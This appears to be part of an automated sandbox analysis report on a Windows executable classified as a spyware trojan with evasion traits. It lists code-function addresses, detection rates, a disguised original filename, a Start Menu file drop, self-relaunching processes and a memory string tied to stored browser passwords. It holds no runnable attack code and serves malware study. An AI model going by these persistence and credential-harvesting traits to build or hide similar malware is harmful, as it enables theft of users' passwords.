            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe | Code function: 7_2_02E1CCB0 | 7_2_02E1CCB0
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe | Code function: 7_2_02E1B4B7 | 7_2_02E1B4B7
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe | Code function: 7_2_02E136B9 | 7_2_02E136B9
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe | Code function: 7_2_02E10DB8 | 7_2_02E10DB8
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe | Code function: 7_2_02E15EB8 | 7_2_02E15EB8
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe | Code function: 7_2_02E1F7B8 | 7_2_02E1F7B8
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe | Code function: 7_2_02E1DFBF | 7_2_02E1DFBF
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe | Code function: 7_2_02E16380 | 7_2_02E16380
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe | Code function: 7_2_02E1FC80 | 7_2_02E1FC80
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe | Code function: 7_2_02E1B980 | 7_2_02E1B980
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe | Code function: 7_2_02E10489 | 7_2_02E10489
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe | Code function: 7_2_02E1E489 | 7_2_02E1E489
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 7_2_02E124887_2_02E12488
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 7_2_02E14B887_2_02E14B88
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 7_2_02E176917_2_02E17691
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 7_2_02E1B9907_2_02E1B990
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 7_2_02E104987_2_02E10498
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 7_2_02E1E4987_2_02E1E498
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 7_2_02E12D9B7_2_02E12D9B
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 7_2_02E1A19B7_2_02E1A19B
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 7_2_02E150607_2_02E15060
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 7_2_02E1E9607_2_02E1E960
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 7_2_02E1A6607_2_02E1A660
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 7_2_02E144677_2_02E14467
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 7_2_02E11B687_2_02E11B68
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 7_2_02E17B687_2_02E17B68
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 7_2_02E1D1687_2_02E1D168
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 7_2_02E1636F7_2_02E1636F
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 7_2_02E1A6707_2_02E1A670
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 7_2_02E124777_2_02E12477
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 7_2_02E1D1787_2_02E1D178
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 7_2_02E18E787_2_02E18E78
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 7_2_02E100407_2_02E10040
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 7_2_02E1D6407_2_02E1D640
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 7_2_02E1BE477_2_02E1BE47
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 7_2_02E112487_2_02E11248
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 7_2_02E13B487_2_02E13B48
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 7_2_02E1934B7_2_02E1934B
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 7_2_02E1E9517_2_02E1E951
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 7_2_02E193507_2_02E19350
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 7_2_02E150507_2_02E15050
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 7_2_02E17B577_2_02E17B57
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 7_2_02E13B587_2_02E13B58
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 7_2_02E1BE587_2_02E1BE58
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 7_2_02E11B587_2_02E11B58
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 7_2_02E1C3207_2_02E1C320
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 7_2_02E180207_2_02E18020
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 7_2_02E109287_2_02E10928
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 7_2_02E155287_2_02E15528
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 7_2_02E1EE287_2_02E1EE28
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 7_2_02E1AB287_2_02E1AB28
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 7_2_02E1322B7_2_02E1322B
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 7_2_02E1D62F7_2_02E1D62F
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 7_2_02E180307_2_02E18030
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 7_2_02E112377_2_02E11237
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 7_2_02E132387_2_02E13238
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 7_2_02E1AB387_2_02E1AB38
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 7_2_02E168387_2_02E16838
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 7_2_02E1B0007_2_02E1B000
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 7_2_02E16D007_2_02E16D00
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 7_2_02E1DB087_2_02E1DB08
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 7_2_02E129087_2_02E12908
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 7_2_02E1980C7_2_02E1980C
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 7_2_02E16D107_2_02E16D10
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 7_2_02E1C3107_2_02E1C310
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 7_2_02E100177_2_02E10017
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 7_2_02E1EE177_2_02E1EE17
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 7_2_02E155197_2_02E15519
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 7_2_02E129187_2_02E12918
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 7_2_02E198187_2_02E19818
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 7_2_02E109187_2_02E10918
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 7_2_02E3BE107_2_02E3BE10
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 7_2_02E357C07_2_02E357C0
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 7_2_02E3F5A07_2_02E3F5A0
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 7_2_02E328E07_2_02E328E0
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 7_2_02E33EC07_2_02E33EC0
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 7_2_02E30CC07_2_02E30CC0
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 7_2_02E354A07_2_02E354A0
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 7_2_02E322A07_2_02E322A0
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 7_2_02E30CAF7_2_02E30CAF
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 7_2_02E392817_2_02E39281
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 7_2_02E338807_2_02E33880
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 7_2_02E306807_2_02E30680
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 7_2_02E322907_2_02E32290
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 7_2_02E34E607_2_02E34E60
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 7_2_02E31C607_2_02E31C60
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 7_2_02E332407_2_02E33240
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 7_2_02E300407_2_02E30040
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 7_2_02E348207_2_02E34820
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 7_2_02E316207_2_02E31620
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 7_2_02E3F2287_2_02E3F228
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 7_2_02E32C007_2_02E32C00
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 7_2_02E348107_2_02E34810
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 7_2_02E3F21E7_2_02E3F21E
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 7_2_02E341E07_2_02E341E0
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 7_2_02E30FE07_2_02E30FE0
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 7_2_02E325C07_2_02E325C0
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 7_2_02E33BA07_2_02E33BA0
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 7_2_02E309A07_2_02E309A0
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 7_2_02E31F807_2_02E31F80
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 7_2_02E351807_2_02E35180
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 7_2_02E3E78A7_2_02E3E78A
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 7_2_02E3F5907_2_02E3F590
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 7_2_02E3E7987_2_02E3E798
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 7_2_02E335607_2_02E33560
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 7_2_02E303607_2_02E30360
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 7_2_02E351707_2_02E35170
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 7_2_02E34B407_2_02E34B40
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 7_2_02E319407_2_02E31940
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 7_2_02E32F207_2_02E32F20
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 7_2_02E3D5387_2_02E3D538
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 7_2_02E345007_2_02E34500
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 7_2_02E313007_2_02E31300
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 7_2_02E46C887_2_02E46C88
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 7_2_02E4E6687_2_02E4E668
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 7_2_02E4E3487_2_02E4E348
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 7_2_02E405087_2_02E40508
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 7_2_02E4F2E87_2_02E4F2E8
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 7_2_02E4C0E87_2_02E4C0E8
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 7_2_02E48EE87_2_02E48EE8
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 7_2_02E404F77_2_02E404F7
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 7_2_02E4AAF77_2_02E4AAF7
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 7_2_02E4D6C87_2_02E4D6C8
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 7_2_02E472C87_2_02E472C8
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 7_2_02E4A4C87_2_02E4A4C8
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 7_2_02E4ECA87_2_02E4ECA8
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 7_2_02E488A87_2_02E488A8
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 7_2_02E4BAA87_2_02E4BAA8
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 7_2_02E4D0887_2_02E4D088
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 7_2_02E49E887_2_02E49E88
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 7_2_02E488987_2_02E48898
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 7_2_02E4EC987_2_02E4EC98
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 7_2_02E482687_2_02E48268
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 7_2_02E4B4687_2_02E4B468
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 7_2_02E400407_2_02E40040
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 7_2_02E4FC487_2_02E4FC48
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 7_2_02E4CA487_2_02E4CA48
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 7_2_02E498487_2_02E49848
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 7_2_02E4E0287_2_02E4E028
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 7_2_02E47C287_2_02E47C28
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 7_2_02E4AE287_2_02E4AE28
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 7_2_02E4FC377_2_02E4FC37
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 7_2_02E4F6087_2_02E4F608
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 7_2_02E4C4087_2_02E4C408
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 7_2_02E492087_2_02E49208
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 7_2_02E4001F7_2_02E4001F
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 7_2_02E4D9E87_2_02E4D9E8
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 7_2_02E475E87_2_02E475E8
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 7_2_02E4A7E87_2_02E4A7E8
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 7_2_02E4C3F97_2_02E4C3F9
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 7_2_02E4EFC87_2_02E4EFC8
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 7_2_02E48BC87_2_02E48BC8
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 7_2_02E4BDC87_2_02E4BDC8
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 7_2_02E4D3A87_2_02E4D3A8
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 7_2_02E46FA87_2_02E46FA8
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 7_2_02E4A1A87_2_02E4A1A8
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 7_2_02E4E9887_2_02E4E988
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 7_2_02E4B7887_2_02E4B788
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 7_2_02E485887_2_02E48588
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 7_2_02E4D3977_2_02E4D397
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 7_2_02E4CD687_2_02E4CD68
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 7_2_02E49B687_2_02E49B68
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 7_2_02E4E9787_2_02E4E978
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 7_2_02E47F487_2_02E47F48
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 7_2_02E4B1487_2_02E4B148
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 7_2_02E4F9287_2_02E4F928
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 7_2_02E4C7287_2_02E4C728
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 7_2_02E495287_2_02E49528
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 7_2_02E4DD087_2_02E4DD08
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 7_2_02E479087_2_02E47908
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 7_2_02E4AB087_2_02E4AB08
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 7_2_02E723007_2_02E72300
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 7_2_02E700407_2_02E70040
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 7_2_02E707607_2_02E70760
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 7_2_02E70E487_2_02E70E48
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 7_2_02E715307_2_02E71530
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 7_2_02E71C187_2_02E71C18
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 7_2_02E722F17_2_02E722F1
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 7_2_02E7001F7_2_02E7001F
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 7_2_02E707507_2_02E70750
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 7_2_02E70E387_2_02E70E38
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 7_2_02E715217_2_02E71521
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 7_2_02E71C087_2_02E71C08
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 7_2_02ED12AF7_2_02ED12AF
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 7_2_02ED12B87_2_02ED12B8
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 7_2_02ED7B707_2_02ED7B70
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 7_2_02ED10607_2_02ED1060
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 7_2_02ED04487_2_02ED0448
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 7_2_35CD51487_2_35CD5148
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 7_2_35CD18507_2_35CD1850
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 7_2_35CD1FA87_2_35CD1FA8
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 7_2_35CD2A907_2_35CD2A90
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 7_2_35CD96687_2_35CD9668
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 7_2_35CDCDC07_2_35CDCDC0
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 7_2_35CD51427_2_35CD5142
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 7_2_35CDF9217_2_35CDF921
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 7_2_35CD9D387_2_35CD9D38
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 7_2_35CDF9307_2_35CDF930
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 7_2_35CDF4C87_2_35CDF4C8
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 7_2_35CD8CC07_2_35CD8CC0
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 7_2_35CDF4D87_2_35CDF4D8
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 7_2_35CDF0807_2_35CDF080
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 7_2_35CD8CB17_2_35CD8CB1
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 7_2_35CD18417_2_35CD1841
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 7_2_35CD00407_2_35CD0040
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 7_2_35CDF0717_2_35CDF071
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 7_2_35CD00067_2_35CD0006
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 7_2_35CDEC187_2_35CDEC18
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 7_2_35CDEC287_2_35CDEC28
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 7_2_35CDE7C07_2_35CDE7C0
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 7_2_35CDE7D07_2_35CDE7D0
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 7_2_35CD1F9C7_2_35CD1F9C
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 7_2_35CDE36D7_2_35CDE36D
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 7_2_35CDE3787_2_35CDE378
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 7_2_35CDDF117_2_35CDDF11
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 7_2_35CDDF207_2_35CDDF20
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 7_2_35CD0B207_2_35CD0B20
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 7_2_35CD0B307_2_35CD0B30
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 7_2_35CDDAC87_2_35CDDAC8
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 7_2_35CD2A807_2_35CD2A80
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 7_2_35CDDAB97_2_35CDDAB9
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 7_2_35CDD6607_2_35CDD660
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 7_2_35CDD6707_2_35CDD670
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 7_2_35CDD2097_2_35CDD209
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 7_2_35CDD2187_2_35CDD218
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe | Code function: String function: 00402B38 appears 47 times
            Source: GBYfjUz4a5.exe, 00000000.00000002.1543653473.000000000044D000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenametoggler triumvirates.exe4 vs GBYfjUz4a5.exe
            Source: GBYfjUz4a5.exe, 00000007.00000000.1540645122.000000000044D000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenametoggler triumvirates.exe4 vs GBYfjUz4a5.exe
            Source: GBYfjUz4a5.exe, 00000007.00000002.2482541121.0000000002FA0000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameclr.dllT vs GBYfjUz4a5.exe
            Source: GBYfjUz4a5.exe, 00000007.00000002.2504931204.00000000331C7000.00000004.00000010.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameUNKNOWN_FILET vs GBYfjUz4a5.exe
            Source: GBYfjUz4a5.exe | Binary or memory string: OriginalFilenametoggler triumvirates.exe4 vs GBYfjUz4a5.exe
            Source: GBYfjUz4a5.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
            Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@3/30@5/5
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe | Code function: 0_2_004045C8 GetDlgItem, SetWindowTextW, SHBrowseForFolderW, CoTaskMemFree, lstrcmpiW, lstrcatW, SetDlgItemTextW, GetDiskFreeSpaceW, MulDiv, SetDlgItemTextW
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe | Code function: 0_2_0040206A CoCreateInstance
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\separationerne
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe | Mutant created: NULL
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe | File created: C:\Users\user\AppData\Local\Temp\nsiE214.tmp
            Source: GBYfjUz4a5.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe | File read: C:\Users\desktop.ini
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: GBYfjUz4a5.exe, 00000007.00000002.2505203474.00000000335D0000.00000004.00000800.00020000.00000000.sdmp, GBYfjUz4a5.exe, 00000007.00000002.2505203474.00000000335F6000.00000004.00000800.00020000.00000000.sdmp, GBYfjUz4a5.exe, 00000007.00000002.2505203474.0000000033602000.00000004.00000800.00020000.00000000.sdmp, GBYfjUz4a5.exe, 00000007.00000002.2505203474.00000000335C2000.00000004.00000800.00020000.00000000.sdmp, GBYfjUz4a5.exe, 00000007.00000002.2505203474.00000000335B2000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: GBYfjUz4a5.exe | Virustotal: Detection: 67%
            Source: GBYfjUz4a5.exe | ReversingLabs: Detection: 50%
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe | File read: C:\Users\user\Desktop\GBYfjUz4a5.exe
            Source: unknown | Process created: C:\Users\user\Desktop\GBYfjUz4a5.exe "C:\Users\user\Desktop\GBYfjUz4a5.exe"
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe | Process created: C:\Users\user\Desktop\GBYfjUz4a5.exe "C:\Users\user\Desktop\GBYfjUz4a5.exe"
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe | Process created: C:\Users\user\Desktop\GBYfjUz4a5.exe "C:\Users\user\Desktop\GBYfjUz4a5.exe"
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe | Section loaded: apphelp.dll
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe | Section loaded: version.dll
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe | Section loaded: kernel.appcore.dll
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe | Section loaded: uxtheme.dll
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe | Section loaded: shfolder.dll
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe | Section loaded: windows.storage.dll
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe | Section loaded: wldp.dll
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe | Section loaded: propsys.dll
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe | Section loaded: riched20.dll
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe | Section loaded: usp10.dll
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe | Section loaded: msls31.dll
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe | Section loaded: textinputframework.dll
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe | Section loaded: coreuicomponents.dll
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe | Section loaded: coremessaging.dll
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe | Section loaded: ntmarta.dll
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe | Section loaded: coremessaging.dll
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe | Section loaded: wintypes.dll
